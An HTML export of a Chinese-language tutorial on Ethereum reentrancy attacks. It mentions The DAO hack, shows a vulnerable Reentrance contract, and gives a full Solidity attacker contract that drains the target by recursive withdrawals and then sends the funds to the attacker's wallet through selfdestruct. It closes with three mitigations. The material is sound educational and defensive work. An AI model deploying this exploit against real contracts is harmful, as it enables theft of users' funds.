<!DOCTYPE html><html><head>
      <title>reentrace_intro</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:////Users/dayong/.vscode/extensions/shd101wyy.markdown-preview-enhanced-0.4.3/node_modules/@shd101wyy/mume/dependencies/katex/katex.min.css">
      
      

      
      
      
      
      
      

      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="%E4%B8%80-%E9%87%8D%E5%85%A5%E6%94%BB%E5%87%BB%E7%9A%84%E5%BD%B1%E5%93%8D">&#x4E00;&#x3001;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x7684;&#x5F71;&#x54CD;</h1>

<p>&#x4EE5;&#x592A;&#x574A;&#x5386;&#x53F2;&#x4E0A;&#x5F71;&#x54CD;&#x6700;&#x5927;&#x7684;&#x9ED1;&#x5BA2;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x4E4B;&#x4E00;&#xFF0C;the dao&#x4E8B;&#x4EF6;&#x5C31;&#x662F;&#x9ED1;&#x5BA2;&#x5229;&#x7528;&#x6F0F;&#x6D1E;&#x8FDB;&#x884C;&#x7684;&#x91CD;&#x5165;&#x653B;&#x51FB;&#xFF0C;the dao&#x4E8B;&#x4EF6;&#x5BFC;&#x81F4;the dao&#x5408;&#x7EA6;&#x4E2D;&#x7684;&#x6240;&#x6709;etc&#x88AB;&#x76D7;&#xFF0C;&#x4EE5;&#x592A;&#x574A;&#x56E0;&#x6B64;&#x4E8B;&#x4EF6;&#x5206;&#x53C9;&#x4E3A;etc&#x4E0E;eth</p>
<h1 class="mume-header" id="%E4%BA%8C-%E5%AE%9E%E4%BE%8B%E4%BB%8B%E7%BB%8D">&#x4E8C;&#x3001;&#x5B9E;&#x4F8B;&#x4ECB;&#x7ECD;</h1>

<p>&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;Renentrace&#x4E3A;&#x76EE;&#x6807;&#x5408;&#x7EA6;&#xFF0C;&#x90E8;&#x7F72;&#x6B64;&#x5408;&#x7EA6;&#x540E;&#x7ED9;&#x5408;&#x7EA6;&#x4E2D;&#x8F6C;&#x8D26;5eth&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x5229;&#x7528;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x6765;&#x5C06;&#x6B64;&#x5408;&#x7EA6;&#x4E2D;&#x7684;eth&#x5168;&#x90E8;&#x53D6;&#x8D70;</p>
<h2 class="mume-header" id="1-%E7%9B%AE%E6%A0%87%E5%90%88%E7%BA%A6">1. &#x76EE;&#x6807;&#x5408;&#x7EA6;</h2>

<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.4.18;

/**
 * @title SafeMath
 * @dev Math operations with safety checks that throw on error
 */
library SafeMath {

  /**
  * @dev Multiplies two numbers, throws on overflow.
  */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    if (a == 0) {
      return 0;
    }
    uint256 c = a * b;
    assert(c / a == b);
    return c;
  }

  /**
  * @dev Integer division of two numbers, truncating the quotient.
  */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    // assert(b &gt; 0); // Solidity automatically throws when dividing by 0
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn&apos;t hold
    return c;
  }

  /**
  * @dev Subtracts two numbers, throws on overflow (i.e. if subtrahend is greater than minuend).
  */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    assert(b &lt;= a);
    return a - b;
  }

  /**
  * @dev Adds two numbers, throws on overflow.
  */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    assert(c &gt;= a);
    return c;
  }
}

contract Reentrance {
  
  using SafeMath for uint256;
  mapping(address =&gt; uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] &gt;= _amount) {
      if(msg.sender.call.value(_amount)()) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  function() public payable {}
}
</code></pre><h2 class="mume-header" id="2%E5%88%86%E6%9E%90%E6%BA%90%E7%A0%81">2.&#x5206;&#x6790;&#x6E90;&#x7801;</h2>

<p>withdraw&#x51FD;&#x6570;&#x4E2D;&#x5148;&#x5224;&#x65AD;balances[msg.sender] &gt;= _amount&#xFF0C;&#x5982;&#x679C;&#x6761;&#x4EF6;&#x6EE1;&#x8DB3;&#xFF0C;&#x901A;&#x8FC7;call&#x51FD;&#x6570;&#x7ED9;msg.sender&#x8F6C;&#x8D26;&#xFF0C;&#x8F6C;&#x8D26;&#x5B8C;&#x6210;&#x540E;&#x518D;&#x5BF9;balances[msg.sender]&#x51CF;&#x64CD;&#x4F5C;&#x3002;<br>
&#x8FD9;&#x91CC;&#x6709;&#x56DB;&#x70B9;&#x7EC4;&#x5408;&#x5F62;&#x6210;&#x4E00;&#x4E2A;&#x6F0F;&#x6D1E;&#xFF1A;</p>
<ol>
<li>&#x4EE5;balances[msg.sender] &gt;= _amount&#x4E3A;&#x5224;&#x65AD;&#x6761;&#x4EF6;&#xFF0C;&#x6EE1;&#x8DB3;&#x5219;&#x8FDB;&#x884C;&#x8F6C;&#x8D26;</li>
<li>&#x5728;&#x8F6C;&#x8D26;&#x65F6;&#xFF0C;&#x5982;&#x679C;&#x6536;&#x6B3E;&#x5730;&#x5740;&#x662F;&#x5408;&#x7EA6;&#xFF0C;&#x5219;&#x4F1A;&#x89E6;&#x53D1;&#x8BE5;&#x6536;&#x6B3E;&#x5730;&#x5740;&#x5408;&#x7EA6;&#x7684;fallback&#x51FD;&#x6570;&#xFF1B;&#x800C;&#x8F6C;&#x8D26;&#x4F7F;&#x7528;call&#x51FD;&#x6570;&#x65F6;&#xFF0C;&#x9ED8;&#x8BA4;&#x6CA1;&#x6709;gas&#x9650;&#x5236;&#xFF0C;&#x8FD9;&#x6837;&#x5408;&#x7EA6;&#x7684;fallback&#x51FD;&#x6570;&#x5C31;&#x4F1A;&#x6210;&#x529F;&#x6267;&#x884C;</li>
<li>&#x8F6C;&#x8D26;&#x4E4B;&#x540E;&#x624D;&#x5BF9;balances[msg.sender]&#x51CF;&#x64CD;&#x4F5C;&#xFF0C;&#x5BFC;&#x81F4;&#x53EF;&#x4EE5;&#x5728;&#x8C03;&#x7528;&#x6536;&#x6B3E;&#x5730;&#x5740;&#x5408;&#x7EA6;&#x7684;fallback&#x51FD;&#x6570;&#x65F6;&#xFF0C;&#x9012;&#x5F52;&#x8C03;&#x7528;&#x56DE;withdraw&#x51FD;&#x6570;&#xFF0C;&#x8FD9;&#x65F6;msg.sender&#x867D;&#x7136;&#x5DF2;&#x7ECF;&#x8F6C;&#x5E10;&#x4E00;&#x90E8;&#x5206;&#xFF0C;&#x4F46;balances[msg.sender]&#x7684;&#x503C;&#x8FD8;&#x6CA1;&#x6709;&#x53D8;&#x5316;&#xFF1B;&#x8FD9;&#x6837;&#x5C31;&#x53EF;&#x4EE5;&#x4E0D;&#x65AD;&#x5FAA;&#x73AF;&#x76F4;&#x5230;&#x672C;&#x5408;&#x7EA6;&#x8D44;&#x91D1;&#x5168;&#x90E8;&#x8F6C;&#x79FB;&#x5230;msg.sender&#xFF1B;</li>
<li>&#x5F53;&#x9012;&#x5F52;&#x8F6C;&#x8D26;&#x5B8C;&#x6210;&#x540E;&#xFF0C;&#x591A;&#x6B21;&#x6267;&#x884C;&#x8BED;&#x53E5;balances[msg.sender] -= _amount&#x8FDB;&#x884C;&#x51CF;&#x64CD;&#x4F5C;&#xFF0C;&#x7531;&#x4E8E;&#x8F6C;&#x51FA;&#x6570;&#x91CF;&#x5B9E;&#x9645;&#x5927;&#x4E8E;&#x7528;&#x6237;&#x8D26;&#x6237;&#x4F59;&#x989D;&#xFF0C;&#x6240;&#x4EE5;&#x4F1A;&#x4E0B;&#x6EA2;&#x51FA;&#xFF0C;&#x4F46;&#x4E0D;&#x4F1A;&#x5F02;&#x5E38;&#xFF0C;&#x56E0;&#x4E3A;solidity&#x662F;&#x5141;&#x8BB8;&#x4E0B;&#x6EA2;&#x51FA;&#x7684;&#xFF0C;&#x81F3;&#x6B64;&#x6F0F;&#x6D1E;&#x5F62;&#x6210;</li>
</ol>
<h2 class="mume-header" id="3%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B">3.&#x653B;&#x51FB;&#x6D41;&#x7A0B;</h2>

<h3 class="mume-header" id="31-%E6%A0%B9%E6%8D%AE%E6%BC%8F%E6%B4%9E%E7%BC%96%E5%86%99%E6%94%BB%E5%87%BB%E5%90%88%E7%BA%A6">3.1 &#x6839;&#x636E;&#x6F0F;&#x6D1E;&#x7F16;&#x5199;&#x653B;&#x51FB;&#x5408;&#x7EA6;</h3>

<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.5.0;
import &apos;./Reentrance.sol&apos;;

contract Reentrance {
    function donate(address _to) public payable;   
    function withdraw(uint _amount) public;
    function balanceOf(address _who) public view returns (uint balance);
}

contract Hacker {
    
    Reentrance r;
    uint public attackCount  = 0;
    
    constructor(address payable reentranceAddr) public{
        r = Reentrance(reentranceAddr);
    }
    
    function() payable external {
        attackCount++;
        uint b = address(r).balance;
        if(b&gt;0){
            uint amount = b&gt;r.balanceOf(address(this))?r.balanceOf(address(this)):b;
            r.withdraw(amount);
        }
    }
    
    function donate() public payable{
        r.donate.value(msg.value)(address(this));
    }
    
    function attack(uint amount) public {
        attackCount++;
        r.withdraw(amount* 1 ether);
    }
    
    function entranceBalance() public view returns(uint){
        return address(r).balance;
    }
    
    function hackBalance() public view returns(uint){
        return address(this).balance;
    }

    function kill(address payable beneficy) public {
        selfdestruct(beneficy);
    }
}
</code></pre><h3 class="mume-header" id="32-%E9%83%A8%E7%BD%B2%E5%90%88%E7%BA%A6%E5%B9%B6%E8%BD%AC%E8%B4%A65eth">3.2 &#x90E8;&#x7F72;&#x5408;&#x7EA6;&#x5E76;&#x8F6C;&#x8D26;5ETH</h3>

<p><img src="./reentrance1.jpeg" alt></p>
<h3 class="mume-header" id="33-%E9%83%A8%E7%BD%B2%E6%94%BB%E5%87%BB%E5%90%88%E7%BA%A6%E5%B9%B6%E4%BD%BF%E7%94%A8%E6%94%BB%E5%87%BB%E5%90%88%E7%BA%A6%E5%90%91%E7%9B%AE%E6%A0%87%E5%90%88%E7%BA%A6%E5%AD%98%E9%92%B1">3.3 &#x90E8;&#x7F72;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x5E76;&#x4F7F;&#x7528;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x5411;&#x76EE;&#x6807;&#x5408;&#x7EA6;&#x5B58;&#x94B1;</h3>

<p>&#x7531;&#x4E8E;&#x9700;&#x8981;&#x6EE1;&#x8DB3;&#x6761;&#x4EF6;<code>balances[msg.sender] &gt;= _amount</code>&#x624D;&#x80FD;&#x53D6;&#x94B1;&#xFF0C;&#x6240;&#x4EE5;&#x9700;&#x8981;&#x5148;&#x5145;&#x94B1;&#xFF0C;&#x6211;&#x4EEC;&#x8C03;&#x7528;&#x653B;&#x51FB;&#x5408;&#x7EA6;donate&#x5145;&#x94B1;1eth &#x4F7F;&#x5F97;<code>balances[msg.sender] &gt; 0</code><br>
<img src="./reentrance2.jpeg" alt></p>
<h3 class="mume-header" id="34-%E5%8F%91%E5%8A%A8%E6%94%BB%E5%87%BB">3.4 &#x53D1;&#x52A8;&#x653B;&#x51FB;</h3>

<p>&#x8C03;&#x7528;<code>attach(1)</code>&#x5373;&#x53D1;&#x8D77;&#x653B;&#x51FB;&#xFF0C;&#x9012;&#x5F52;&#x53D6;&#x94B1;&#x540E;&#xFF0C;&#x53D1;&#x73B0;Reentrance&#x5408;&#x7EA6;&#x8D26;&#x6237;&#x4F59;&#x989D;&#x4E3A;0&#xFF0C;&#x653B;&#x51FB;&#x5B8C;&#x6210;&#x3002;<br>
<img src="./reentrance3.jpeg" alt></p>
<h3 class="mume-header" id="35-%E5%B0%86%E8%B5%84%E9%87%91%E8%BD%AC%E5%88%B0%E6%99%AE%E9%80%9A%E8%B4%A6%E6%88%B7">3.5 &#x5C06;&#x8D44;&#x91D1;&#x8F6C;&#x5230;&#x666E;&#x901A;&#x8D26;&#x6237;</h3>

<p>&#x8C03;&#x7528;<code>kill(&#x9ED1;&#x5BA2;&#x4E2A;&#x4EBA;&#x94B1;&#x5305;&#x5730;&#x5740;)</code>&#x6740;&#x6B7B;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#xFF0C;&#x8D44;&#x91D1;&#x5C06;&#x4F1A;&#x8F6C;&#x5230;&#x9ED1;&#x5BA2;&#x4E2A;&#x4EBA;&#x94B1;&#x5305;&#x5730;&#x5740;</p>
<h2 class="mume-header" id="4-%E5%A6%82%E4%BD%95%E9%81%BF%E5%85%8D">4. &#x5982;&#x4F55;&#x907F;&#x514D;</h2>

<p>&#x4E09;&#x79CD;&#x65B9;&#x6CD5;&#x5747;&#x53EF;&#xFF1A;</p>
<h3 class="mume-header" id="%E6%96%B9%E6%B3%951">&#x65B9;&#x6CD5;1</h3>

<p>&#x4F7F;&#x7528;send&#x6216;transfer&#x6765;&#x8F6C;&#x8D26;&#xFF0C;&#x56E0;&#x4E3A;send&#x548C;transfer&#x8F6C;&#x8D26;&#x65F6;&#x4F7F;&#x7528;&#x56FA;&#x5B9A;gas 2300&#xFF0C; &#x5982;&#x679C;&#x653B;&#x51FB;&#x5408;&#x7EA6;fallback&#x51FD;&#x6570;&#x4E2D;&#x6709;&#x9012;&#x5F52;&#xFF0C;&#x5219;&#x4F1A;&#x5BFC;&#x81F4;fallback&#x51FD;&#x6570;&#x6267;&#x884C;&#x5931;&#x8D25;&#x6216;&#x4EA4;&#x6613;&#x7ED3;&#x675F;</p>
<h3 class="mume-header" id="%E6%96%B9%E6%B3%952">&#x65B9;&#x6CD5;2</h3>

<p>&#x5148;&#x8FDB;&#x884C;&#x4F59;&#x989D;&#x51CF;&#x64CD;&#x4F5C;&#x518D;&#x8FDB;&#x884C;&#x8F6C;&#x8D26;&#x64CD;&#x4F5C;</p>
<h3 class="mume-header" id="%E6%96%B9%E6%B3%953">&#x65B9;&#x6CD5;3</h3>

<p>&#x5F53;&#x4E0A;&#x65B9;&#x653B;&#x51FB;&#x5B8C;&#x6210;&#x540E;&#xFF0C;&#x67E5;&#x770B;<code>balanceOf(hacker&#x5408;&#x7EA6;&#x5730;&#x5740;)</code>&#x4F1A;&#x53D1;&#x73B0;&#x65F6;&#x4E00;&#x4E2A;&#x5F88;&#x5927;&#x7684;&#x6570;&#xFF0C;&#x56E0;&#x4E3A;&#x8D1F;&#x6EA2;&#x51FA;&#x4E86;&#xFF0C;&#x800C;solidity&#x65F6;&#x5141;&#x8BB8;&#x8D1F;&#x6EA2;&#x51FA;&#x800C;&#x4E0D;&#x5F02;&#x5E38;&#x7684;&#xFF1B;<br>
&#x6240;&#x4EE5;&#x4F7F;&#x7528; SafeMath &#x8FDB;&#x884C;&#x4F59;&#x989D;&#x51CF;&#x64CD;&#x4F5C;&#xFF0C;&#x5F53;&#x9012;&#x5F52;&#x8F6C;&#x8D26;&#x5B8C;&#x6210;&#x540E;&#x8FDB;&#x884C;&#x4F59;&#x989D;&#x51CF;&#x64CD;&#x4F5C;&#x65F6;&#x5C31;&#x4F1A;&#x5F02;&#x5E38;&#xFF0C;&#x4EA4;&#x6613;&#x5931;&#x8D25;&#x3002;</p>

      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>